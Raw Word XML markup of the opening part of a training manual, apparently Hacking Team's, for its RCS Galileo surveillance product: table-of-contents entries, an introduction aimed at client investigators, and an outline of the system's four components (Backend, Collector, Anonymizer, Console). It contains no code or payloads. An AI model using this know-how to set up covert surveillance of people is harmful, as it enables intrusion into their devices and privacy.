              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642529 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>95</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30" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Audit: Understanding Audit Entries</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642530 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>96</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31" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Monitor: Tracking RCS Components</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642531 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>97</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="003F3DE1" w:rsidRDefault="003A4380">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc372642532" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Investigation Wizard and Archive Wizard</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642532 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>98</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00F2724D" w:rsidRDefault="00F2724D">
          <w:r w:rsidRPr="00351355">
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00CA57D2" w:rsidRDefault="00CA57D2" w:rsidP="00CA57D2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2805"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2724D" w:rsidRPr="00CA57D2" w:rsidRDefault="00CA57D2" w:rsidP="00CA57D2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2805"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="00F2724D" w:rsidRPr="00CA57D2" w:rsidSect="00CE07E2">
          <w:headerReference w:type="default" r:id="rId11"/>
          <w:footerReference w:type="default" r:id="rId12"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A719CD" w:rsidRDefault="00500A4F" w:rsidP="00A719CD">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc372642474"/>
      <w:r w:rsidRPr="00224FDB">
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00351355" w:rsidRDefault="00183A31" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="006C6EE5">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RCS Galileo Advanced Training Manual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00183A31">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>comprehensive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> guide for Hacking Team clients, designed and built to provide a complete training experience with the supervision of qualified personnel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00183A31" w:rsidRDefault="00183A31" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00057B63" w:rsidRDefault="00057B63" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This document is to be considered a valuable tool for working alongside the </w:t>
      </w:r>
      <w:r w:rsidRPr="006C6EE5">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RCS Galileo Training Agenda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, provided to all training participants visiting the Hacking Team headquarter in Milan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00057B63" w:rsidRDefault="00057B63" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C6EE5" w:rsidRDefault="006C6EE5" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00057B63" w:rsidRDefault="006C6EE5" w:rsidP="006C6EE5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2743200" cy="20764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p w:rsidR="00057B63" w:rsidRDefault="00057B63" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00651B15" w:rsidRDefault="00651B15" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00057B63" w:rsidRDefault="00651B15" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00651B15">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The objective of this document is to sufficiently </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">prepare all the </w:t>
      </w:r>
      <w:r w:rsidRPr="00651B15">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">participants in order to pass the </w:t>
      </w:r>
      <w:r w:rsidRPr="00651B15">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RCS Galileo Self Assessment Test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00651B15">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">thus </w:t>
      </w:r>
      <w:r w:rsidRPr="00651B15">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">achieve an appropriate level of knowledge </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">of the product </w:t>
      </w:r>
      <w:r w:rsidRPr="00651B15">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to be able to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">immediately </w:t>
      </w:r>
      <w:r w:rsidRPr="00651B15">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>start investigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00651B15">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00651B15" w:rsidRDefault="00651B15" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003708AD" w:rsidRDefault="003708AD" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003708AD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Although some sections of this document may be less </w:t>
      </w:r>
      <w:r w:rsidR="00276033">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">useful </w:t>
      </w:r>
      <w:r w:rsidRPr="003708AD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">or not included in the </w:t>
      </w:r>
      <w:r w:rsidR="00276033">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">product </w:t>
      </w:r>
      <w:r w:rsidRPr="003708AD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">license acquired by the </w:t>
      </w:r>
      <w:r w:rsidR="00276033">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r w:rsidRPr="003708AD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the basic knowledge of the entire system is a fundamental prerogative in order to be able to master the product correctly and safely.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003708AD" w:rsidRDefault="003708AD" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C4D8D" w:rsidRDefault="003C4D8D" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00327361" w:rsidRDefault="00327361" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00327361" w:rsidRDefault="00327361" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00327361" w:rsidRDefault="00327361" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C4D8D" w:rsidRDefault="003C4D8D" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00327361" w:rsidRDefault="00327361" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00276033" w:rsidRDefault="00276033" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00183A31" w:rsidRDefault="006C6EE5" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00276033">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The RCS Galileo Advanced Training Manual should not be considered to replace the official product documentation, which all attendees are invited to consult in order to extend the capabilities of knowledge and us</w:t>
      </w:r>
      <w:r w:rsidR="00271B68">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">age </w:t>
      </w:r>
      <w:r w:rsidRPr="00276033">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>of the product.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A5AF3" w:rsidRDefault="006A5AF3" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A5AF3" w:rsidRPr="00276033" w:rsidRDefault="006A5AF3" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The c</w:t>
      </w:r>
      <w:r w:rsidRPr="006A5AF3">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">opying, disclosure or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the usage </w:t>
      </w:r>
      <w:r w:rsidRPr="006A5AF3">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">of this manual outside Hacking Team </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">premises </w:t>
      </w:r>
      <w:r w:rsidRPr="006A5AF3">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is strictly </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prohibited</w:t>
      </w:r>
      <w:r w:rsidRPr="006A5AF3">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C565B" w:rsidRPr="00351355" w:rsidRDefault="003C565B" w:rsidP="008D63EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A719CD" w:rsidRDefault="00A719CD" w:rsidP="00A719CD">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc372642475"/>
      <w:r w:rsidRPr="00DA06EB">
        <w:t>RCS Galileo Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="0082626E" w:rsidRDefault="0082626E" w:rsidP="0082626E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The installation of </w:t>
      </w:r>
      <w:r w:rsidRPr="007703AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RCS 9 (codename Galileo)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> requires different hardware systems and software components that must be properly connected, installed and configured.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0090193F" w:rsidRDefault="0090193F" w:rsidP="0082626E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0090193F" w:rsidRDefault="0090193F" w:rsidP="0082626E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The following paragraphs provide information on how to implement a minimal working installation of RCS in a distributed architecture layout.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0082626E" w:rsidRDefault="0082626E" w:rsidP="0082626E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0082626E" w:rsidRDefault="0082626E" w:rsidP="0082626E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F748CD" w:rsidRPr="0071587C" w:rsidRDefault="00F748CD" w:rsidP="00A719CD">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc372642476"/>
      <w:r w:rsidRPr="0071587C">
        <w:t>Advanced Architecture</w:t>
      </w:r>
      <w:r w:rsidR="006A0F56" w:rsidRPr="0071587C">
        <w:t xml:space="preserve"> and System</w:t>
      </w:r>
      <w:r w:rsidR="00D36733" w:rsidRPr="0071587C">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006A0F56" w:rsidRPr="0071587C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidR="00F86940">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A16E96" w:rsidRDefault="00A16E96" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008D5DEA" w:rsidRDefault="002A6DDF" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A6DDF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The advanced architecture of RCS (also known as distributed architecture) consists of </w:t>
      </w:r>
      <w:r w:rsidR="003C2A10">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4 different systems</w:t>
      </w:r>
      <w:r w:rsidR="008D5DEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E30A07" w:rsidRDefault="002A6DDF" w:rsidP="007113E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A6DDF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidR="004A65D2" w:rsidRPr="004A65D2">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Master Node</w:t>
      </w:r>
      <w:r w:rsidR="004A65D2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A6DDF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(also known as </w:t>
      </w:r>
      <w:r w:rsidR="004A65D2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Backend</w:t>
      </w:r>
      <w:r w:rsidRPr="002A6DDF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">), 1 </w:t>
      </w:r>
      <w:r w:rsidR="004A65D2" w:rsidRPr="004A65D2">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Collector</w:t>
      </w:r>
      <w:r w:rsidRPr="002A6DDF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also known as </w:t>
      </w:r>
      <w:r w:rsidR="004A65D2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Frontend</w:t>
      </w:r>
      <w:r w:rsidRPr="002A6DDF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">), 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="004A65D2">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Anonymizer</w:t>
      </w:r>
      <w:r w:rsidRPr="002A6DDF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="004A65D2">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Console</w:t>
      </w:r>
      <w:r w:rsidRPr="002A6DDF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD31ED" w:rsidRDefault="00DD31ED" w:rsidP="007113E8">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7513"/>
        <w:gridCol w:w="986"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD31ED" w:rsidTr="00DD31ED">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DD31ED" w:rsidRDefault="00DD31ED" w:rsidP="007113E8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7513" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DD31ED" w:rsidRPr="003B0583" w:rsidRDefault="00DD31ED" w:rsidP="00DD31ED">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DD31ED" w:rsidRDefault="00651A7C" w:rsidP="0060757D">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00DD31ED">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">.1 RCS </w:t>
            </w:r>
            <w:r w:rsidR="00DD31ED">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251885568" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F80D107" wp14:editId="7BDFBAE1">
